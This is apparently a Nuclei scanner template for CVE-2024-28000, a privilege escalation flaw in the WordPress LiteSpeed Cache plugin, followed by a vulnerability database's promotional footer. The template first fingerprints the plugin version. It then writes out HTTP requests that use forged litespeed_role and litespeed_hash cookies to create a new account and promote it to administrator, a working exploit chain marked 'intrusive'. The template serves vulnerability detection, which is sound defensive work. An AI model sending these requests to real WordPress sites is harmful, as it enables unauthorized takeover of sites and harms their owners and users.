id: CVE-2024-28000
info:
name: WordPress LiteSpeed Cache - Unauthenticated Privilege Escalation to Admin
author: melmathari
severity: critical
description: |
Incorrect Privilege Assignment vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Privilege Escalation.This issue affects LiteSpeed Cache: from 1.9 through 6.3.0.1.
impact: |
Unauthenticated attackers can escalate privileges to administrator level, gaining full control of the WordPress site.
remediation: |
Update LiteSpeed Cache plugin to a patched version addressing CVE-2024-28000.
reference:
- https://patchstack.com/database/vulnerability/litespeed-cache/wordpress-litespeed-cache-plugin-6-3-0-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve
- https://www.exploit-db.com/exploits/52328
- https://nvd.nist.gov/vuln/detail/CVE-2024-28000
- https://vulncheck.com/xdb/6f169f41e032
- https://blog.securelayer7.net/cve-2024-28000-litespeed-cache-plugin/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-28000
cwe-id: CWE-266,NVD-CWE-Other
epss-score: 0.68266
epss-percentile: 0.99244
cpe: cpe:2.3:a:litespeedtech:litespeed_cache:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: litespeedtech
product: litespeed_cache
framework: wordpress
publicwww-query: "/wp-content/plugins/litespeed-cache/"
tags: cve,cve2024,wordpress,wp,wp-plugin,litespeed-cache,priv-esc,intrusive,vkev,vuln
flow: http(1) || (http(2) && http(3))
variables:
username: "{{to_lower(rand_text_alpha(5))}}"
password: "{{rand_text_alphanumeric(12)}}!"
email: "{{rand_base(8)}}@{{rand_base(5)}}.com"
http:
- raw:
- |
GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, 'LiteSpeed Cache')
- compare_versions(version, '<= 6.3.0.1')
condition: and
extractors:
- type: regex
part: body
group: 1
name: version
regex:
- 'Stable tag: ([0-9.]+)'
- raw:
- |
POST /wp-json/wp/v2/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Cookie: litespeed_role=1; litespeed_hash={{litespeed_hash}}
{
"username": "{{username}}",
"password": "{{password}}",
"email": "{{email}}"
}
# The litespeed_hash input was required to escalate privileges to users
matchers:
- type: dsl
dsl:
- status_code == 201
- contains(content_type, "application/json")
- contains_all(body, "first_name","username")
condition: and
internal: true
extractors:
- type: json
name: user_id
json:
- ".id"
internal: true
- raw:
- |
PUT /wp-json/wp/v2/users/{{user_id}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Cookie: litespeed_role=1; litespeed_hash={{litespeed_hash}}
{
"roles": ["administrator"]
}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(content_type, "application/json")
- contains_all(body, "administrator","registered_date")
condition: and
# digest: 4b0a00483046022100de27fd891f68a79435f7d9602dfa248f870db39024b7bf9766bc962794b51682022100aa4513932afe2e78e6ddc13720335ef0db43c728c26317645de154fdc7ee84bf:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation